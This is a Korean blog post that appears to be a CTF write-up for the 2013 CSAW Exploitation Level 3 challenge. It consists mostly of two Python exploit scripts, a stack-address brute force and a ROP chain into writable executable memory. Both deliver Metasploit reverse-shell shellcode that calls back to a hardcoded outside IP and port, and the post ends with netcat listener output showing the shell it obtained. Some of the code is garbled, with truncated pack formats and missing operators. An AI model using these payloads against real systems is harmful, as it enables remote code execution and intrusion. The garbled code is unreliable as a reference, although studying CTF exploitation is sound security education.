고정 헤더 영역
상세 컨텐츠
본문
반응형
왜 이문제를 헤맷는지 모르겟지만.
어쨋든 대회중엔 시간이 하루밖에 안나서 못푼 문제다.
근데 오늘 갑자기 아이디어가 팍 떠오르고 바로 exploit을 시도했다.
fil_chalAslr : Off (fork())
NX : Off (execstack : X)
from struct import pack, unpack
import time
p = lambda x : pack(" up = lambda x : unpack(" HOST = "128.238.66.217" HOST = "192.168.242.129" PORT = 34266 offset = 0x41c # linux/x86/shell_reverse_tcp - 95 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # VERBOSE=false, LHOST=220.117.247.200, LPORT=12071, # ReverseConnectRetries=5, ReverseAllowProxy=false, # PrependSetresuid=false, PrependSetreuid=false, # PrependSetuid=false, PrependSetresgid=false, # PrependSetregid=false, PrependSetgid=false, # PrependChrootBreak=false, AppendExit=false, # InitialAutoRunScript=, AutoRunScript= shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8" "\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80" "\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01" "\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16" "\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f" "\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0" "\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66") def exploit(addr): exploit = "\x90" * 0x384 exploit = shellcode exploit = "\x90" * (offset - len(exploit)) exploit = p(addr) * 2# eip return exploit print "[*] CSAW Exploitation Level3 Exploit" # by sweetchip print "[*] Start BroutFore." for i in range(0xbf879000, 0xbf000000, -0x200): s = socket(AF_INET,SOCK_STREAM) s.connect((HOST,PORT)) print hex(i) s.recv(4096) s.recv(4096) s.send("csaw2013") # trig bof s.recv(4096) s.send("S1mplePWD") s.recv(4096) s.send("-1") s.send(exploit(i)) raw_input("\ngive me shell! > ")
브루트 포싱으로 쉘을 따는건데 약간 느려서 주소를 설정해서 작성햇다.
대회시간대가 아니라 csaw 서버에서 못풀고 로컬에서 풀엇다 ㅠㅠ
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
새로운 풀이
from struct import pack, unpack
from socket import *
import time
p = lambda x : pack(" up = lambda x : unpack(" HOST = "192.168.0.109" PORT = 34266 # linux/x86/shell_reverse_tcp - 95 bytes # http://www.metasploit.com shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8" "\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80" "\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01" "\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16" "\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f" "\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0" "\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66") freespace = 0x0804b000 # rwx recv = 0x08048890 pr = 0x08048943 offset = 0x41c print "[*] CSAW Exploitation Level3 Exploit" # by sweetchip s = socket(AF_INET,SOCK_STREAM) s.connect((HOST,PORT)) print s.recv(4096) print s.recv(4096) s.send("csaw2013") print s.recv(4096) s.send("S1mplePWD") print s.recv(4096) s.send("-1") print s.recv(4096) time.sleep(1) payload = "A"*(0x41c 4) # ebp payload = p(recv) # rop_start payload = p(pr) payload = p(4) payload = p(freespace) payload = p(len(shellcode)) payload = p(0) s.send(payload) s.send(shellcode) raw_input("\ngive me shell! > ") """ C:\Users\Administrator>nc -lvp 12071 listening on [any] 12071 ... 192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA connect to [192.168.0.93] from (UNKNOWN) [192.168.0.1] 51765: NO_DATA whoami sweetchip """
반응형
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
| 2013 POC - POWER OF XX 여성 해킹방어대회 Easy2.Net Write-up (22) | 2013.11.09 |
|---|---|
| 2013 POC - POWER OF XX 여성해킹방어대회 Easy.Net Write-up (0) | 2013.11.08 |
| 2013 CSAW CTF Exploitation 200 [exploit] (0) | 2013.09.23 |
| 2013 CSAW CTF Exploitation 100 [exploit] (0) | 2013.09.23 |
| 2013 WhiteHatContest 단체전 WEB 150 Serial2 풀이 Write_up (0) | 2013.09.18 |
